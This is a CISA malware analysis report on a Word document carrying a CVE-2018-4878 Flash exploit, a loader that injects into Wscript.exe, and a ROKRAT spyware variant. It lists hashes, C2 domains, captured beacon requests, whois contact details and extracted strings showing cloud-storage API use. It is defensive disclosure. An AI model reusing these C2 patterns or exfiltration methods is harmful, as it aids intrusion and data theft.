Malware Analysis Report (AR20-133D)

MAR-10160323-1.v2

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

The CISA Code & Media Analysis team received three artifacts for analysis. The first artifact is a malicious Microsoft Word document that contains an embedded Shockwave Flash (SWF) application file. This embedded SWF file attempts to exploit the vulnerability detailed within CVE-2018-4878. The second artifact executes an embedded resource named “JOK” and injects it into the Windows application “Wscript.exe.” This embedded resource contains an encoded variant of the malware known as ROKRAT. The third artifact in this report is the embedded ROKRAT variant, which was extracted from the loader during analysis.

For a downloadable copy of IOCs, see MAR-10160323-1.v2.stix.

Submitted Files (5)

3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c (3f98c434d7b39de61a8b459180dd46...)

851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a (aa525af1589156fc09f78e69b3b034...)

e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd (d2881e56e66aeaebef7efaa60a58ef...)

e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 (5c6c1ed910e7c9740a0289a6d27890...)

fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 (111d205422fe90848c2f41cc84ebd9...)

Domains (2)

www.1588-2040.co.kr

www.korea-tax.info

Findings

3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c

Tags

CVE-2018-4878trojan

Details
Name 3f98c434d7b39de61a8b459180dd46a3
Size 121344 bytes
Type Composite Document File V2 Document, Cannot read section info
MD5 3f98c434d7b39de61a8b459180dd46a3
SHA1 1584b3ce64835a3c7b796139fbd981a9f2cddb6c
SHA256 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
SHA512 27643afc00fda2dd8b447af1e6950d65fe5b4dd91a8eb022fef68694126efe41fd8895a6c065c261507bb526668c27f4bc055ac58c592d43cf760c32e365be2d
ssdeep 1536:+dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9n:u1FLNEfBj2NSRvZQnEDtShuA3H9yW
Entropy 7.947501
Antivirus
Ahnlab SWF/Agent
Antiy Trojan[Exploit]/SWF.CVE-2018-4878
Avira EXP/CVE-2018-4878.A.Gen
BitDefender Exploit.Agent.MS
ClamAV Swf.Trojan.Rokrat-6443186-0
Cyren Siwifi
ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Exploit.Agent.MS (B)
Ikarus Trojan.SWF.Exploit
McAfee RDN/Generic Exploit.lv
Microsoft Security Essentials Exploit:SWF/Korpode.A
NetGate Exploit.Win32.Generic
Quick Heal Exp.OLE.CVE-2018-4878.C
Sophos Troj/SwfExp-OI
Symantec Trojan.Gen.NPE.2
TACHYON Trojan-Exploit/W97.Agent.Gen
TrendMicro TROJ_EX.F2A7C559
TrendMicro House Call TROJ_EX.F2A7C559
YARA Rules

No matches found.

ssdeep Matches
97 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1
97 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87
Relationships
3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
Description

This file is a malicious Microsoft Word document. This document contains an embedded malicious ShockWave Flash (SWF) file (851b7b04cc) designed to exploit the vulnerability detailed within CVE-2018-4878.

851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a

Tags

CVE-2018-4878trojan

Details
Name aa525af1589156fc09f78e69b3b03428
Size 117864 bytes
Type Macromedia Flash data, version 32
MD5 aa525af1589156fc09f78e69b3b03428
SHA1 6ff889358923ab2a0de80303be9ac559a555b9b9
SHA256 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
SHA512 3a82f830bcf547c94a3b0e56ffa27330328b392a4d1356f7e62a28c18d2eb110507968a3f66e51e985ffceb3640885e5402623cf9ab987ae7a005cff2b1edd57
ssdeep 1536:4dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9S:41FLNEfBj2NSRvZQnEDtShuA3H9yf
Entropy 7.987027
Antivirus
Ahnlab SWF/Cve-2018-4878.R.SS18
Avira EXP/CVE-2018-4878.A.Gen
BitDefender Exploit.Agent.MS
ClamAV Win.Trojan.Agent-6551186-0
Cyren SWF/CVE-2018-4878.B!Camelot
ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Exploit.Agent.MS (B)
Ikarus Trojan.SWF.Exploit
McAfee Exploit-CVE2018-4878.b
Microsoft Security Essentials Exploit:SWF/Korpode.A!gen
Quick Heal Exp.SWF.CVE-2018-4878.D
Sophos Troj/SwfExp-OK
Symantec Trojan.Gen.NPE.2
TACHYON Trojan-Exploit/SWF.Agent.Gen
YARA Rules

No matches found.

ssdeep Matches
97 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
99 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1
97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87
Relationships
851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
851b7b044c... Connected_To www.korea-tax.info
Description

This file is the malicious ShockWave Flash (SWF) file embedded in the Microsoft Word document 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c. When the malware is executed, it attempts to connect to the hard-coded Command and Control (C2) server "www.korea-tax.info."

www.korea-tax.info

Tags

command-and-control

URLs
  • www.korea-tax.info/crossdomain.xml
  • www.korea-tax.info/main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
Ports
  • 80 TCP
HTTP Sessions
  • GET /crossdomain.xml HTTP/1.1
    Host: www.korea-tax.info
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
  • GET /main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1
    Host: www.korea-tax.info
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
Whois

Queried whois.afilias.info with "korea-tax.info"...

Domain Name: KOREA-TAX.INFO
Registry Domain ID: D503300000055962553-LRMS
Registrar WHOIS Server:
Registrar URL: http://www.PublicDomainRegistry.com
Updated Date: 2018-02-10T20:31:57Z
Creation Date: 2017-12-12T05:52:58Z
Registry Expiry Date: 2018-12-12T05:52:58Z
Registrar Registration Expiration Date:
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com
Registrar Abuse Contact Phone: +1.2013775952
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: C213778924-LRMS
Registrant Name: yang jieun
Registrant Organization: yang jieun
Registrant Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Registrant City: Kwangmyong
Registrant State/Province: Kyonggi-do
Registrant Postal Code: 14200
Registrant Country: KR
Registrant Phone: +82.1044612320
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: john.chapman91128@gmail.com
Registry Admin ID: C213778924-LRMS
Admin Name: yang jieun
Admin Organization: yang jieun
Admin Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Admin City: Kwangmyong
Admin State/Province: Kyonggi-do
Admin Postal Code: 14200
Admin Country: KR
Admin Phone: +82.1044612320
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: john.chapman91128@gmail.com
Registry Tech ID: C213778924-LRMS
Tech Name: yang jieun
Tech Organization: yang jieun
Tech Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Tech City: Kwangmyong
Tech State/Province: Kyonggi-do
Tech Postal Code: 14200
Tech Country: KR
Tech Phone: +82.1044612320
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: john.chapman91128@gmail.com
Registry Billing ID: C213778924-LRMS
Billing Name: yang jieun
Billing Organization: yang jieun
Billing Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do
Billing City: Kwangmyong
Billing State/Province: Kyonggi-do
Billing Postal Code: 14200
Billing Country: KR
Billing Phone: +82.1044612320
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: john.chapman91128@gmail.com
Name Server: NS3.HOSTINGER.COM
Name Server: NS4.HOSTINGER.COM
Name Server: NS1.HOSTINGER.COM
Name Server: NS2.HOSTINGER.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

Relationships
www.korea-tax.info Connected_From 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
Description

Identified malicious C2 Server.

fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0

Tags

CVE-2018-4878trojan

Details
Name 111d205422fe90848c2f41cc84ebd96a
Size 117338 bytes
Type Macromedia Flash data, version 32
MD5 111d205422fe90848c2f41cc84ebd96a
SHA1 b03f6f336c07d514edb15d6e3fefd98432cae7e2
SHA256 fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
SHA512 a8e7db77fd6f27ae8ca18be8ed644df3443d17b048fc6baf1b7496da2810b014e19a35e9502de252ad65cf4feb07ccba53aeb567ad62d897231c1a3b17d619b5
ssdeep 3072:BebZ1dssmUo7VUthHkNEVVKJ6ydYBpb2N4r1Je:sbZfssAGoQymsgM
Entropy 7.983610
Antivirus
Ahnlab SWF/Cve-2018-4878.R.SS18
Antiy Trojan[Exploit]/SWF.CVE-2018-4878
Avira EXP/CVE-2018-4878.A.Gen
BitDefender Script.SWF.C589
ClamAV Swf.Trojan.Rokrat-6443186-0
Cyren SWF/CVE-2018-4878.B!Camelot
ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Script.SWF.C589 (B)
Ikarus Trojan.SWF.Exploit
McAfee Exploit-CVE2018-4878.b
Microsoft Security Essentials Exploit:SWF/Korpode.A!gen
NANOAV Exploit.Swf.CVE20184878.exmycd
Quick Heal Exp.SWF.CVE-2018-4878.D
Sophos Troj/SWFExp-OL
Symantec Trojan.Gen.2
TACHYON Trojan-Exploit/SWF.Agent.Gen
TrendMicro SWF_EXP.3A46FD51
TrendMicro House Call SWF_EXP.3A46FD51
YARA Rules

No matches found.

ssdeep Matches
99 3004196da6055c6f062c94a9aae8dc357fa19b953b071049083e69e840083cf9
Relationships
fec71b8479... Connected_To www.1588-2040.co.kr
Description

This file is a malicious ShockWave Flash (SWF) file designed to exploit the vulnerability detailed within CVE-2018-4878. When executed, the malware attempts to connect to the hard-coded command-and-control (C2) server "www.1588-2040.co.kr."

www.1588-2040.co.kr

Tags

command-and-control

URLs
  • www.1588-2040.co.kr/crossdomain.xml
  • www.1588-2040.co.kr/design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
Ports
  • 80 TCP
HTTP Sessions
  • GET /crossdomain.xml HTTP/1.1
    Host: www.1588-2040.co.kr
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
  • GET /design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1
    Host: www.1588-2040.co.kr
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
    Accept: */*
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
Whois

Domain Name                 : 1588-2040.co.kr
Registrant                 : S.S. Moon
Registrant Address         : 1303 manhatan b/d 36-2, Yeoeuido-dong Yeongdeungpo-gu Seoul Korea
Registrant Zip Code         : 150749
Administrative Contact(AC) : S.S. Moon
AC E-Mail                 : card15882040@nate.com
AC Phone Number             : 02-2090-3500
Registered Date             : 2009. 07. 03.
Last Updated Date         : 2015. 07. 03.
Expiration Date             : 2018. 07. 03.
Publishes                 : Y
Authorized Agency         : Asadal, Inc.(http://www.asadal.co.kr)
DNSSEC                     : unsigned

Primary Name Server
Host Name                : ns.epart.com

Secondary Name Server
Host Name                : ns1.epart.com

Relationships
www.1588-2040.co.kr Connected_From fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
Description

Identified malicious C2 domain.

e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd

Tags

backdoordroppertrojan

Details
Name d2881e56e66aeaebef7efaa60a58ef9b
Size 626688 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d2881e56e66aeaebef7efaa60a58ef9b
SHA1 c09c1be69e5a206bcfe3d726773f0b0ddecb3622
SHA256 e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
SHA512 da6e40bcebc6161386142caa6c1e68faf7f520cc48cbb514d8029d65f9bb0cac14bde435eb584a998be9e379cc875b85719cc0d4ee9d0fed73b5c20cf7da7fe8
ssdeep 12288:cbeQy0+6dUlyAcdqfAkMvGpns9gKYLd+NjhzZkZf7:AfuJGv2ns9XRkZf
Entropy 7.866467
Antivirus
Ahnlab Trojan/Win32.Loader
Antiy Trojan/Win32.RockRat
Avira TR/Dropper.Gen
BitDefender Trojan.GenericKD.41796224
ClamAV Win.Trojan.Rokrat-6443187-0
Cyren W32/Trojan.IKOU-3732
ESET Win32/Spy.Agent.PHF trojan
Emsisoft Trojan.GenericKD.41796224 (B)
Filseclab Trojan.RockRat.gen.qzrl
Ikarus Trojan.Win32.Krypt
K7 Trojan ( 00525b861 )
McAfee Trojan-FPCM!D2881E56E66A
Microsoft Security Essentials Trojan:Win32/Korpode.A!dha
NANOAV Trojan.Win32.RockRat.exmijf
NetGate Trojan.Win32.Malware
Quick Heal Trojan.RockRat.S1875120
Sophos Mal/FakeAV-ST
Symantec Backdoor.Rokrat
Systweak trojan.korpode
TrendMicro Backdoo.3FA9A8A6
TrendMicro House Call Backdoo.3FA9A8A6
Vir.IT eXplorer Trojan.Win32.Spy.AST
VirusBlokAda Malware-Cryptor.Inject.gen
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
e1546323dc... Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
Description

This file is a loader. It is designed to load and execute data contained within an embedded resource named "JOK" into the Windows application "Wscript.exe." The embedded "JOK" resource is approximately 522,848 bytes in size and contains executable code. The beginning portion of the data reveals the presence of a NOP sled (0x90, 0x90, 0x90, ...), which leads to a decoder stub. The decoder code decodes the embedded executable code within the Windows "Wscript.exe" process. The embedded executable code has been identified as ROKRAT (e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573).

 

Screenshots
Figure 1 -

Figure 1 -

e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573

Tags

spywaretrojan

Details
Name 5c6c1ed910e7c9740a0289a6d278908a
Size 520704 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5c6c1ed910e7c9740a0289a6d278908a
SHA1 0e46e026890982da526d8acf9f1ce6287451c9a6
SHA256 e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
SHA512 e2d3059e28998bfb5c0badf3d6d8df28e527037c33b489b7dcc2f392a1d91a568beef410a4feaabc4daee98112142e58394ed5e2a73c71ed0cb46943eb3383d1
ssdeep 6144:Wh65XKGJs5Ve5psLyYuwAKdf9Q4p9FCAkko7cmxBZAk4+AJ6P3VNUo+wABK7Cl/5:SAKdf+4p9J2x0k4+AQ3VNH+rZx7Aq9
Entropy 6.560851
Antivirus
Ahnlab Trojan/Win32.Hwdoor
Antiy Trojan[Spy]/Win32.Agent
Avira HEUR/AGEN.1133065
BitDefender Gen:Variant.Graftor.538484
ClamAV Win.Trojan.Rokrat-6380697-0
ESET a variant of Win32/Spy.Agent.PHF trojan
Emsisoft Gen:Variant.Graftor.538484 (B)
Ikarus Trojan-Spy.Agent
K7 Spyware ( 0051fbf81 )
Microsoft Security Essentials Trojan:Win32/Korpode.A!dha
NANOAV Trojan.Win32.Generic.evuabe
NetGate Trojan.Win32.Malware
Sophos Troj/Spy-AQO
Symantec Trojan.Gen.2
Systweak malware.gen-rg
TACHYON Trojan-Spy/W32.Agent.520704.E
TrendMicro TSPY_KO.89D03B8E
TrendMicro House Call TSPY_KO.89D03B8E
Vir.IT eXplorer Trojan.Win32.Spy.BUB
VirusBlokAda TrojanSpy.Agent
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
e200517ab9... Contained_Within e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
Description

This file has been identified as a variant of the malware known as ROKRAT and was obtained by extracting it from the file e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd.

Displayed below are strings of interest extracted from this variant of ROKRAT.

--Begin Strings of Interest--
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36
access_token
authorization_code
bearer
client_id
client_secret
code
expires_in
grant_type
redirect_uri
refresh_token
response_type
scope
state
token
token_type
access_token
authorization_code
bearer
client_id
client_secret
code
expires_in
grant_type
redirect_uri
refresh_token
response_type
scope
state
token
token_type
Accept
Accept-Charset
Accept-Encoding
Accept-Language
Accept-Ranges
Age
Allow
Authorization
Cache-Control
Connection
Content-Encoding
Content-Language
Content-Length
Content-Location
Content-MD5
Content-Range
Content-Type
Content-Disposition
Date
ETag
Expect
Expires
From
Host
If-Match
If-Modified-Since
If-None-Match
If-Range
If-Unmodified-Since
Last-Modified
Location
Max-Forwards
Pragma
Proxy-Authenticate
Proxy-Authorization
Range
Referer
Retry-After
Server
Trailer
Transfer-Encoding
Upgrade
User-Agent
Vary
Via
Warning
WWW-Authenticate
Cookie
Set-Cookie
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
en-US,en;q=0.8
Bearer
http://127.0.0.1/
https://api.box.com/oauth2/token
https://account.box.com/api/oauth2/authorize
https://api.box.com/2.0/folders/%s/items
GET
entries
etag
name
sequence_id
type
folder
file
POST
201
409
DELETE
204
https://api.box.com/2.0/files/%s/content
200
https://api.box.com/2.0/files/%s
https://api.box.com/2.0/files/%s/trash
https://upload.box.com/api/2.0/files/content
--opxer--
Content-Disposition: form-data; name="attributes"
"}}
", "parent":{"id":"
{"name":"
Content-Disposition: form-data; name="file"; filename="
Content-Type: video/dat
multipart/form-data;boundary=--opxer--
error
sha1
description
created_at
modified_at
size
https://api.box.com/2.0/folders/%s
Error
var request_token = '
max-age=0
<input type="hidden" name="ic" value="
<input type="hidden" name="state" value="
<form action="
box_visitor_id=
bv=
cn=
site_preference=
302
vector<T> too long
invalid string position
string too long
Aapplication/json
path
https://api.dropboxapi.com/2/files/delete
https://content.dropboxapi.com/2/files/upload
application/octet-stream
{"path":"%s","mode":{".tag":"overwrite"}}
{"path":"%s"}
Dropbox-API-Arg
https://content.dropboxapi.com/2/files/download
Ahttps://api.pcloud.com/oauth2_token
https://my.pcloud.com/oauth2/authorize
https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1
--wwjaughalvncjwiajs--
Content-Type: voice/mp3
multipart/form-data;boundary=--wwjaughalvncjwiajs--
fileids
https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1
hosts
https://%s%s
https://api.pcloud.com/deletefile?path=%s
true
%s/%s
OAuth
PUT
href
https://cloud-api.yandex.net/v1/disk/resources?path=%s&permanently=%s
false
202
https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s
method
https://cloud-api.yandex.net/v1/disk/resources/download?path=%s
--End Strings of Interest--

Relationship Summary

3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
851b7b044c... Connected_To www.korea-tax.info
www.korea-tax.info Connected_From 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
fec71b8479... Connected_To www.1588-2040.co.kr
www.1588-2040.co.kr Connected_From fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
e1546323dc... Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
e200517ab9... Contained_Within e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.us-cert.gov.

Revisions

May 12, 2020: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

Was this document helpful?  Yes  |  Somewhat  |  No